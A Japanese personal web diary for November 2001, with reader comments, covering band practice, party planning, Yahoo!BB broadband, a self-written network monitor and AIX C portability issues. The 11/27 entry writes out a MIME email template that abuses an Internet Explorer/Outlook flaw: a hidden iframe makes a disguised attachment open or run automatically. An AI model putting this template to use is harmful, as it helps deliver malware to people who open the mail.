ひらちゃんの日記 2001年11月号

1999年5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2000年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2001年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2002年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2003年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2004年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2005年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2006年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2007年1月号 | 2月はサボり | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 10月号 | 11月号 | 12月号
2008年1月号 | 2月号 | 3月号 | 4月号 | 5月号 | 6月号 | 7月号 | 8月号 | 9月号 | 10月号 | 11月号 | 12月号
2009年1月号 | 2月号 | 4月号 | 5月号 | 8月号 | 9月号 | 11月号 | 12月号
2010年1月号 | 2月号 | 3月号 | 5月号 | 6月号 | 8月号 | 9月号 | 10月号 | 12月号
2011年1月号 | 3月号 | 4月号 | 8月号
ひらちゃんのホーム | 感想はこちら
★つっこみ、質問、意見、ちょっとした感想など、「つっこむ」ボタンでつっこんでね。

Counter
11/30(金)
★ネットワークセキュリティ
今日は知り合いの会社が近所に出来たというので、視察(^^; に行って来た。 ネットワークセキュリティテクノロジージャパンという会社だ。 韓国のHackersLabという会社の技術だけを日本に持って来て運用をするらしい。 要するに、ネットワークセキュリティ監視+運用+対応のアウトソーシングの会社だ。 NDAにサインしたのであまりいろいろ書けないが、なかなかすごい集団が集まっているらしい。 確かに、僕のサーバにもしょっちゅう韓国から攻撃が来ている。 韓国にはハッカー、クラッカーが多いのだろう。 本屋に行っても、普通の女子大生が「クラッキング対策」みたいな本を立ち読みしてたりする。 日本はといえば、最近本屋に行っていないので分からないが、韓国のほど細かく説明してある本はないんじゃないかと思う。

僕の勝手な類推だが、韓国でこういうのが盛んな背景にはADSLの普及率の高さがあるのではないかと思う。 日本のようなISDNが主流の環境では、パスワードをクラックするにも線が細いので時間がかかる。 仮に踏み台にしたとしても、細いが故に次のところに大した攻撃も出来ないだろう。 日本に本当のブロードバンドが普及した時、ウィルスなどの普及速度は今よりも確実に速くなるのだろうと思う。 ああ、恐ろしいことだ。 ちなみに、うちのYahoo!BBも流れてるパケット見たら、windowsの出すbroadcastがいっぱいあります。 やらないけど、よその家のPCを覗くのは比較的簡単だろう。 あー、こわいこわい。

名前
・GRojLrerpVbvceW [2014/1/26 02:01:12] (by ypmMtLCaP)
・12345678 [2021/3/17 16:57:08] (by 12345678)
・12345678 [2021/3/17 18:28:37] (by 12345678)


11/29(木)
★バンド
今日は、というか30日だが、0時から6時までバンドの練習であった。 大阪の時のメンバ−の一人がこっちで組んでいたバンドだ。 東京に来た時ちょうどドラマ−が足りなかったので入れてもらったのだ。 休みがバラバラなので夜中なのだ。 前に集まったのはいつだろう。 もう思い出せないくらいずいぶん前だ。 たぶん昨年の最初の頃だろう。 実に久しぶりだ。 ドラムをたたくのもほんとに久しぶりだ。 最初は全然体が動かなかったが、しばらくするとすぐにかんを取り戻した。 さすがに体が覚えているらしい。 また、ライブやなんかもやりたいものだ。
名前


11/28(水)
★韓国料理の店
12月に忘年会をやるのだが、またまた、例によって幹事だ。 肉と魚(そう、実は魚もであった・・・。だから、寿司はホントはだめだったのだなぁ。)が食べられない人でも大丈夫な料理ということで、韓国料理にしようということになった。 今日は、新宿経由で帰ったので、ぶらぶらっと職安通り周辺を散策してみることにした。 いろいろな韓国料理屋がいっぱいあって、やっぱりどこがいいのかはわからない。 知らないエリアも散策したので、結局よけいに決められなくなった気がする。 そこで、店から出て来た韓国人姉妹をつかまえた。 在日韓国人のおすすめを伺おうという魂胆である。

が、しかし、この姉妹、日本に来て2ヶ月の韓国人であった。 とりあえず得られた情報は、その出て来た店はちょっと高めだったということだけであった。 ちなみに、他はほとんど行ったことがないらしい。(^^; 忘年会の場所を探してるのだ、とか話していると、なぜか、その界隈を案内してくれることになった。 そして、前に行ったことがある店がよかったというので、とりあえず、そこを紹介してもらうことにした。 が、場所をはっきり知らないらしい。 しかし、そこはさすが、韓国人。 いろんな人に聞きまくる、聞きまくる。(^^; しかし、日本語はあまり聞き取れないので、聞くのは僕の役目だ。 しかも、なぜか、聞いた中のトラックの移動花屋のお姉さんは韓国人であった。 結局、友達に電話したりして、目的地は見つかった。 これも、候補に上げよう。

10人くらいで、焼き肉もあって、一品料理もいっぱいあって、安くて、家庭的な店、どっか、おすすめありますかぁ?

名前
・12345678 [2021/3/17 18:28:47] (by 12345678)


11/27(火)
★ウィルス
最近、また、ウィルスがガンガン来出した。 昨日あたりから、また、新しいウイルスが来るようになった。 これが、なんと、昨日の時点では、まだウィルスチェッカーには引っかからなかったのだ。 ウィルスチェックのパターファイルが出来るより前にウィルスを受け取ってしまうとは、なんて恐ろしい世の中だ。 しかも、これはすごいことに、Outlookやなんかで見ると、というか、見ようとするだけで、ウィルスファイルを実行しようとするのだ。 うちでやってみると、メールをクリックするだけで、「保存する」か「実行する」かを尋ねるダイアログが出た。 IEのバージョンが古かったりすると、ダイアログも出ずに、知らないうちに実行されてしまうのだろう。

ちなみに、ヘッダに、

Content-Type: multipart/related;
	 type="multipart/alternative";
	 boundary="====_ABC1234567890DEF_===="
という風にしておいて、本文を、
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
	 boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
 	 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
	 name="添付ファイル名"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

ここにBASE64エンコードした添付ファイル

--====_ABC1234567890DEF_====

--====_ABC1234567890DEF_====--
というふうにすれば、簡単に再現できた。 友達に、みかん星人を送りつけてみたところ、ダイアログが突然出て実行にすると、みかん星人が現れたらしい。

悪用しないように。

ぱっち

名前
・えーなにそれ!こわー、さっそくパッチをとりにいきまいした。 [2001/11/29 13:22:16] (by ぷらちなぼんさら)
・この穴自体はだいぶ前からあったんだろうけど、問題は、よく来るということ。かなり感染してるんでしょうなぁ。 [2001/11/29 22:03:10] (by ひらちゃん)


11/26(月)
★vsnprintf()とstrings.h
今日は、よその会社にうちのシステムをインストールしに行った。 これが、また、よりによって、AIXなのだ。 うちには、UNIXはSolarisとLinuxの環境しかない。 従って、客先でコンパイルさせてもらった。 予想通りというか、すんなりコンパイルが進みつつも、所々失敗する。 まず、strcasecmp()でお亡くなりである。 プロトタイプ宣言がされていないというのだ。 普通なら、こんなものwarningが出るだけで、defaultの戻り値intで動くはずだ。 それが、この、頑固者はコンパイルを通してくれない。 しかし、不思議なことに、ソースを見ても、「string.h」はincludeされてるのだ。 なんでかなぁ、と思って、/usr/include/string.h の中身を見ると確かに宣言されていない。 わからんので、とりあえず、man strcasecmpすると、なんと、「string.h」ではなく、「strings.h」なのだ。 がーん。 こんなの二つもあるなんて知らなかった・・・。 ちなみに、Linuxでも、Solarisでも、strcasecmp()はstring.hとstrings.hの両方に書かれている。 また、manの内容は、Solarisはstrings.h、Linuxはstring.h だと書いてあった。 まだまだ、知らないことはいっぱいあるものだ。

そして、いろいろして、無事、コンパイルは通ったのだが、なんと、今度は動かない。 追いつめてみると、どうも、vsnprintf()の戻り値があやしい。 Solarisは「The vsnprintf() function returns the number of characters formatted, that is, the number of characters that would have been written to the buffer if it were large enough」なのだ。 つまり、「バッファが十分あったら書き込んだであろう」長さなのだ。 ところが、このAIXめ、実際に書き込んだ文字数を返しているのだ。 まいった・・・。

ちなみに、Linuxだと、「If the output was truncated, the return value is -1」ということで、書き込みきれなかった場合、「-1」なのだ。 また違う・・・。 あーあー、もう、何とかしろよぉ、と思いつつ、もう少し読むと、 「(Thus until glibc 2.0.6. Since glibc 2.1 these functions return the number of characters which would have been written to the final string if enough space had been available.)」 「なぁんていうのは昔の話で、glibc2.1以降は・・・」と意地が悪い。 結局は、Solaisと同じ動きだ。 しかし、まぁ、こうも仕様が違うと怖いねぇ。

名前
・月5万円でAIX機の貸し出しやろかな? ただし3年契約やで [2001/11/27 19:37:43] (by betti)
・AIXなんかいらーーん。(^^; でも、SUNもよー死ぬしなぁ。 [2001/11/29 22:01:43] (by ひらちゃん)
・死ぬのはひらちゃんSUNだけやろ(^^; [2001/11/30 04:58:31] (by betti)
・klark2d4@gmail.com [2015/8/13 12:30:55] (by gordon)


11/25(日)
★連休
連休であった。 しかし、結局何も大したことはしなかった。 ゴロゴロ寝て、起きてはDVDを見て、プログラムをちょこちょこ作って、であった。 あ、部屋の掃除もちょっとした。 積んであるのが横に広がったので、結局狭くなった・・・。 DVDはインビジブルとクイズショウとハムナブトラなんかを見た。 どれも、ジーンと来るような作品ではなかったので、組み合わせ的にちょっと失敗だ。
名前
・12345678 [2021/3/17 18:28:58] (by 12345678)


11/20(火)
★ネットワーク監視
最近、プロバイダの不具合があったり、オルカランドが死んだり、と、ちょっとだけ大活躍したネットワーク監視プログラムを公開しようと思う。 http://www.hirano.cc/lib/net_check_0.90.tar.gzだ。 linuxとSolarisで動作確認している。 Perlのプログラムなので、Perlは必須だ。 Windowsでも頑張れば動くのかも知れないが、僕は頑張らない。 また、ベータ版なので、ドキュメントもない。 ソースを読んでいただきたい。 感想、バグ、要望等あれば、ここのつっこみとか、掲示板に書いていただきたい。 近いうちに正式リリースしよう。

ちなみに、障害報告機能としては、ローカルのsendmail経由のメール、SMTPサーバ経由のメール、IP Messengerを通して通知できる。 正式版までには、SNMPと、障害とみなさない日時の設定が出来るようにしようかな。 と、まぁ、思うだけ。

名前


11/18(日)
★ラッシュアワー2
今日はラッシュアワー2を観て来た。 まさに、香港映画のアクションを取り入れたハリウッド映画という感じで、なかなかよかった。 Jackie Chanはだいぶ年をとったなぁという感じだったけど、相変わらず元気であった。 Chris Tuckerもやはりもしろい。 最後にNGシーンがあるのだが、これがまたまた傑作だ。 1作目は観てないけど問題なく楽しめた。 今度1作目も観てみよう。
名前
・ボクはソードフィッシュ見ました。トラボルタがいい味だしてました。話の内容はタイムリーすぎてなんかコワイ。 [2001/11/20 00:17:07] (by てつ)
・ボクはエボリューション見ました。アメリカのコミック映画はみんなマジメな顔してボケ倒すのでツッコミどころ満載。「そんなあほな〜!!」 [2001/11/25 03:14:02] (by RYU)


11/17(土)
★結婚式
今日は、またまた、結婚式の二次会に行って来た。 前の前の会社の同期だ。 今年は結婚ラッシュらしく、大忙しだ。 次は誰だろうとか思いつつ、自分の番は当分回って来なさそうだなぁ。

しかし、前の前の会社の人以外はどうして誰も結婚しないのだ?!

名前
・俺じゃないことはたしかです。 [2001/11/21 20:55:17] (by 無敵)
・無敵さんもまだまだ先なのかな。 [2001/11/22 01:42:47] (by ひらちゃん)


11/14(水)
★Cable&Wireless IDC
ひらちゃんのサーバを置いてあるISPだ。 オルカランドもここにある。 最近不安定だなぁ、と思って先週末監視プログラムを作ったのだが、早速役に立った。 出来れば、こういうプログラムは役に立たない方がありがたいのだが・・・。 ちなみに、0:57(11月15日ね)から30分間もお亡くなりであった。 原因は知らんが、問題は直近のrouterまで行けなかった。 Cable&Wirelessしっかりしてくれ〜。

しかし、今回、もしかしたらこのツールは必要ないかも知れない、ということもわかった。 なんと、問題が起きて10分以内に2人もの人からサーバにつながらないと連絡があったのだ。 ひらちゃんの監視プログラム顔負けの素早さだ。 そう、彼女たちはここのサイトにあるSOLD OUTのゲームをひたすら頑張っている最中だったのだ。 これからも、監視プログラムに負けないように頑張っていただきたい。 遊んでばかりいずに修論もちゃんと仕上げるように・・・。(^^;

名前
・なんのことかなぁ〜(笑)。目指すのは、”息抜きに人生やってる”って感じかな。 [2001/11/16 14:06:05] (by kk)
・息抜きに人生かぁ。そういうのも、いいかもね。一生懸命生きるのは疲れるもんね。 [2001/11/19 00:54:38] (by ひらちゃん)
・たったの2社で共有しているところに新たに加入した会社が悪さしてたみたいですわ [2001/11/19 11:10:30] (by betti)
・12345678 [2021/3/17 18:29:11] (by 12345678)


11/12(月)
★どんぶり
昨日、ラーメンの鉢を割ってしまった。 大量に洗い物をして、食器のかごに積み上げたら、ついに雪崩が起きたのだ。 幸いほとんどのものは無事であったが、ラーメンの鉢だけは救いきれなかった。 結構便利なもので多目的に使っていたので、残念だ。 うどんやラーメンだけでなく、大量の野菜炒めや、大量の焼きそばや、何でも入るのだ。

そして、代替品として、昨日スーパーでひとつ300円のどんぶり鉢を買った。 ま、普通のラーメン鉢の大きさだ。 ところが、この大きさはどうも中途半端だ。 夜食に、天ぷらきしめんを作ったのだが、1玉入れただけで、満杯だ。 普段3玉食べるので、入らないなぁ、こりゃ。 ダイエットしろということか・・・・。

名前
・3玉、、、ええ加減にせんと、糖尿病になるで。 [2001/11/14 11:28:46] (by りーち)
・す、凄いw(゚o゚)w 三玉も食べちゃうんですね(笑) 新しいどんぶりは、その後どうでしょうね(^-^*) [2001/11/18 13:46:34] (by まゆまゆ)
・食べ過ぎですねぇ。やっぱり。ちと減らさないといけませんね。 [2001/11/19 00:55:49] (by ひらちゃん)
・まゆまゆさん、はじめまして。ですよね? どんぶりは、あふれそうになりながらも大活躍してますよ。どんぶりはオールマイティに使えるからいいですね。(^o^) [2001/11/19 00:57:43] (by ひらちゃん)


11/10(土)
★ネットワーク監視
今日は一日ネットワーク監視のプログラムを作っていた。 最近、オルカランドやこのサーバとのセッションが切れるのを2回体験したのだ。 一回はIDCのメンテナンスであったが・・・。 せっかくだから、と、監視プログラムを作ってみた。 3分間指定されたホストへ到達できないと、その旨とtracerouteの結果をメールするというものだ。 前の前の会社にいた時にも同じものを作ったので、これを作るのは2度目だ。 なんと、無駄なことか。(^^; 前のプログラムはすっかり忘れてしまったが、僕の作ったものだ、きっと同じような構成なのだろう。

せっかくなので、1週間くらい動かしてみて、安定するようだったら、公開しよう。 小規模のネットワーク監視ツールが欲しいという方は楽しみにしていただきたい。

名前


11/9(金)
★宴会
今日は、プロジェクト一段落の宴会であった。 といっても、来週にまだ二つあるので、終了というわけではない。 今回はひらひらが幹事であった。 お肉の食べられない人がいるので、お寿司の食べ放題にした。 ひらひらの頭の中では、肉以外→魚→寿司、と展開されるのだ。 肉と魚以外の食べ放題では、デニーズのサラダバーという選択肢もないではないが、これは宴会向きではない。 今思いついたが、わんこそばや湯豆腐も食べ放題シリーズだな。 今度、幹事に任命されたらそういうのも検討しよう。
名前
・サラダバーで宴会は、ヘルシーやけど、さみしぃよなぁ(^^; [2001/11/18 19:53:53] (by 香織)
・宴会にはあかんやろ。やっぱり。(^^; 落ち着いて考えると、串カツ食べ放題でも、肉以外はたくさんあるからいいわけなのだな。 [2001/11/19 01:00:08] (by ひらちゃん)
・デニーズのサラダバーは無しだけどガストのドリンクバーはありですか? [2001/11/21 20:28:43] (by 無敵)
・ガストのドリンクバーってソフトドリンクだけやろ? それも、宴会にはならんでぇ。 [2001/11/22 01:43:53] (by ひらちゃん)


11/7(水)
★IEとクリップボード
クリップボードをご存じだろうか。 コピー&ペーストするときに、コピーした内容が一時的に保存される所をクリップボードと呼ぶのだ。 その内容が、なんと、IEから読みとれてしまうというのだ。 こりゃぁ、悪いことし放題だ。 ここで実際にそれを体験することが出来る。 一見便利そうだが、こりゃぁかなり危険だわ。
名前
・直接関係は無いけど面白い記事を見つけました。マイクロソフトはユーザーなんてどうでもいいそうです。http://jmm.cogen.co.jp/jmmarchive/a029001.html [2001/11/21 20:40:36] (by 無敵)
・12345678 [2021/3/17 18:29:55] (by 12345678)


11/6(火)
★2chデビュー
ついに、2chにデビューしてしまった。(^^; ここだ。 Yahoo!BBの導入記が紹介されている。 他の個人のページからも、ぽろぽろリンクしてもらっているようだ。 Yahoo!には苦しめられている人がかなりいるようなので、そんな方たちの参考になれば幸いだ。 ま、odyouさんのページなんかを読めば、僕なんかたった3ヶ月弱で開通して、なんてスムーズだったのだろうと思ってしまう。

ひらちゃんのサイトはどこもリンクフリーなのでリンクは大歓迎だ。 あまり悪評とともにリンクされてしまうと、へこむけど・・・。(^^;

名前
・dvJWeMfQclEpS [2014/2/22 22:10:05] (by iavPJIWvUrq)


11/4(日)
★Yahoo!BB
ついに、Yahoo!BBのモデムのパスワードがわかった。 親切な人が、載ってるページを教えてくれたのだ。 さっそく、ログインしてみると、なかなかいい感じだ。 helpを見てみると、natとかbridgeとか、なかなか魅力的なキーワードが並んでいる。 失敗すると、ネットにつながらなくなってしまうので、なかなか思うように遊べないのだが、いろいろ楽しんでみよう。

しかし、まぁ、いろんな掲示板を見ていると、まだ開通してもいないのに、課金されている人もいるらしい。 キャンセルの申請をしてるのに、課金されている人もいるらしい。 僕などは、まだまだ、ましな方だったんだということが判明。 なんてひどいサービスなのだ・・・。 ちなみに、うちはまだ課金はされていない・・・・。

名前
・未開封だった『日経バイト』11月号を開いてみたら、我が家のような環境をブロードバンド僻地と言うそうだ。この記事によると、Yahoo!BBが救ってくれそうな事書いてあるけど、提灯だろうか? [2001/11/6 00:20:19] (by りーち)
・なんと、スムーズに導入できた話も聞いたのだ。ちなみに、茨木市。そんな人もいるのねーん。 [2001/11/19 01:01:46] (by ひらちゃん)


11/2(金)
★Tomak
韓国に、Tomakというゲームが変わったゲームがあるという噂を聞きつけた。 Tomakとは韓国語で、切れ端とか断片とかそんなような意味だ。 何の切れ端か、そう、なんと、このゲーム生首を育てるゲームなのだ。 プリンセスメーカーなどと同じ類なわけだ。 ま、生首といっても、かわいいキャラクターの首から上が植木鉢に植わっているという絵だ。 こわいが、なかなかかわいいのでおもしろい。 ブロードバンドな人は、英語版のお試し版を見つけたので、ダウンロードして試してみるのもいいだろう。 さすが韓国人、発想が斬新だ。
名前
・それって育つと体もできるの?ずーっと首なの? [2001/11/3 23:24:20] (by たま)
・体験版の5ヶ月の間はずっと首でした。しかも、外に出て戻ってくると、違う人になってる・・・。エンディングとかでは体も出てくるのかなぁ。 [2001/11/4 01:22:26] (by ひらちゃん)
・そもそも、オープニングの説明によると、この主人公、神様の世界から「人間は体の関係無しに愛を育てることも出来る」ということを証明するために植木鉢に乗っかってるらしいです。なんやそら。(^^; [2001/11/4 01:24:58] (by ひらちゃん)
・地球が滅んでも俺なら生首より藤崎詩織をえらぶぞ。100%! [2002/1/18 15:15:09] (by アキラ)
・と、ときメモっすか。(^^; 僕は、早乙女さんか朝比奈さんか・・・・。lol [2002/1/19 00:14:41] (by ひらちゃん)


homeひらちゃんのホーム
ひらの yo@hirano.cc